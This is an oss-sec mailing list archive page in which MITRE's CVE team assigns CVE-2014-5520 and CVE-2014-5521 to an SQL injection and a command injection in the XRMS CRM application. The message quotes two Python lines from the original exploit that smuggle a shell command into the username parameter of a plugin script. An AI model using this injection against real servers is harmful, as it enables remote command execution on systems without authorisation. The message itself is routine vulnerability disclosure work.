oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: XRMS SQLi to RCE 0day

From: cve-assign () mitre org
Date: Fri, 29 Aug 2014 05:06:01 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


We get SQL injection via $_SESSION poisoning


Use CVE-2014-5520.



exploit a trivial command injection
cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd


Use CVE-2014-5521.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJUAEH4AAoJEKllVAevmvmsyX0H/3MDCARe+SyjOC1IGHrZC+sM
66Q3DelGzUBB2kU+lXVaEhibITT19oyKl/k//PbippCJv6sdu2gjcxeKWzatbPK9
6zTxfjdrcidxhp3a5VPJQA9Bk/v0sTwFyjz+RN/p1c/GMQV4oHOp5TNv0GUV10A2
PB3cx0/fCKpRa5EbrsFdxAL3lEAw25KiC1SCSZcrssXGuVJKDcfZJNfmiGs1vDpX
TSaULBoe8lLOWr+Xw2az8WOtsh0FX3xhi7Z8ohxnw5AykuJ6Z7CgM875Gj3xM8Tb
e76rwNIvPXMI3z7IcdB8ymt0Z8g0oM4v6IdX8z157Ce5c2tG6U/gwsfPmCSQPpo=
=Zzco
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: